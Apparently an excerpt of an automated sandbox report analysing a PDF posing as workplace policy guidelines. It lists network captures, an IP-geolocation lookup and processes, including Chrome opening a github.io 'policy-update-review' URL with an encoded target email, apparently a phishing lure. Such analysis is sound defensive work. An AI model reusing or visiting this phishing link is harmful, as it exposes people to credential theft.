                                                                                    2024-12-17 23:28:47 UTC15345INData Raw: 33 62 65 39 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 02 00 00 00 22 3a 39 c9 00 00 3b b0 49 44 41 54 78 9c ec bd 09 58 14 57 ba 37 5e d5 fb 42 37 dd 80 ec 28 20 ee 28 0a 88 46 d1 4c 8c 5b 48 34 2a a2 d7 24 2e d1 31 9a 3b 6a 06 93 68 f4 ba 8e 91 31 2e 59 d4 2c 7a 33 c6 68 c4 a8 88 1a 15 31 26 e2 2e a2 20 a0 02 b2 c8 da 2c cd d2 fb 56 d5 d5 f5 7f e0 75 ce ad 0f 4d ee f7 fd bf af 9e 79 66 ee f9 3d 79 3a 4d 77 f5 a9 73 4e fd ce 7b de f5 28 62 59 96 c0 c0 f8 7f 0d c1 3f ba 03 18 ff 9a c0 c4 c2 e0 05 98 58 18 bc 00 13 0b 83 17 60 62 61 f0 02 4c 2c 0c 5e 80 89 85 c1 0b 30 b1 30 78 01 26 16 06 2f c0 c4 c2 e0 05 98 58 18 bc 00 13 0b 83 17 60 62 61 f0 02 4c 2c 0c 5e 80 89 85 c1 0b 30 b1 30 78 01 26 16 06 2f c0 c4 c2 e0 05 98
                                                                                    Data Ascii: 3be9PNGIHDR":9;IDATxXW7^B7( (FL[H4*$.1;jh1.Y,z3h1&. ,VuMyf=y:MwsN{(bY?X`baL,^00x&/X`baL,^00x&/
                                                                                    2024-12-17 23:28:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.44976735.190.80.14438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:47 UTC480OUTPOST /report/v4?s=Fu4V4TG6pcEcLP8N1pZSWTSNKKsjlofmYQ89bvK44sfdvgwfr3K6U7BPoECUrMEUVlbA17LN8lODsZVj6SELNl0hC6%2FUE0AjCso%2FLmSysGWk%2FusC9hyJJQpDO13B8OwsI5zl4Gpd HTTP/1.1
                                                                                    Host: a.nel.cloudflare.com
                                                                                    Connection: keep-alive
                                                                                    Content-Length: 512
                                                                                    Content-Type: application/reports+json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:47 UTC512OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 35 34 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 36 2e 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 31 37 2e 32 34 2e 31 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22
                                                                                    Data Ascii: [{"age":0,"body":{"elapsed_time":2548,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css","sampling_fraction":0.01,"server_ip":"104.17.24.14","status_code":200,"
                                                                                    2024-12-17 23:28:47 UTC168INHTTP/1.1 200 OK
                                                                                    Content-Length: 0
                                                                                    date: Tue, 17 Dec 2024 23:28:47 GMT
                                                                                    Via: 1.1 google
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.449768172.67.69.2264438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:48 UTC337OUTGET /json/ HTTP/1.1
                                                                                    Host: ipapi.co
                                                                                    Connection: keep-alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    Accept: */*
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:48 UTC916INHTTP/1.1 200 OK
                                                                                    Date: Tue, 17 Dec 2024 23:28:48 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 764
                                                                                    Connection: close
                                                                                    Allow: OPTIONS, OPTIONS, POST, HEAD, GET
                                                                                    X-Frame-Options: DENY
                                                                                    Vary: Host, origin
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Referrer-Policy: same-origin
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVprc4Ko7X7fbmXn5zdvA9U7n1SyYLZ1ySnAAumKLKsObH3uC6jcrQMemi6kcevBS6SayRE54EctW4xqRmYye50HscjTauMa6g%2FlBehFdxBsLW%2FiyEOuuSCZ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f3ab10e7b380f3a-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2917&min_rtt=1501&rtt_var=3251&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2790&recv_bytes=919&delivery_rate=1885087&cwnd=165&unsent_bytes=0&cid=237b5d801558cd34&ts=764&x=0"
                                                                                    2024-12-17 23:28:48 UTC453INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 4e 59 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75
                                                                                    Data Ascii: { "ip": "8.46.123.189", "network": "8.46.123.0/24", "version": "IPv4", "city": "New York City", "region": "New York", "region_code": "NY", "country": "US", "country_name": "United States", "country_code": "US", "cou
                                                                                    2024-12-17 23:28:48 UTC311INData Raw: 20 2d 37 33 2e 39 38 38 34 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 20 20 22 75 74 63 5f 6f 66 66 73 65 74 22 3a 20 22 2d 30 35 30 30 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 20 22 2b 31 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 22 3a 20 22 55 53 44 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 44 6f 6c 6c 61 72 22 2c 0a 20 20 20 20 22 6c 61 6e 67 75 61 67 65 73 22 3a 20 22 65 6e 2d 55 53 2c 65 73 2d 55 53 2c 68 61 77 2c 66 72 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 61 72 65 61 22 3a 20 39 36 32 39 30 39 31 2e 30 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 70 6f 70 75 6c 61 74 69 6f 6e
                                                                                    Data Ascii: -73.9884, "timezone": "America/New_York", "utc_offset": "-0500", "country_calling_code": "+1", "currency": "USD", "currency_name": "Dollar", "languages": "en-US,es-US,haw,fr", "country_area": 9629091.0, "country_population


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:18:28:29
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf"
                                                                                    Imagebase:0x7ff6bc1b0000
                                                                                    File size:5'641'176 bytes
                                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:18:28:30
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                    Imagebase:0x7ff74bb60000
                                                                                    File size:3'581'912 bytes
                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:18:28:30
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1604,i,16713143759588623167,3168251973281867099,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                    Imagebase:0x7ff74bb60000
                                                                                    File size:3'581'912 bytes
                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:18:28:32
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/#c2JpZHppbnNraUBoYXJyaXNhc3NvYy5jb20=
                                                                                    Imagebase:0x7ff76e190000
                                                                                    File size:3'242'272 bytes
                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:5
                                                                                    Start time:18:28:34
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1948,i,12000973838117122200,13228138030383639485,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                    Imagebase:0x7ff76e190000
                                                                                    File size:3'242'272 bytes
                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    No disassembly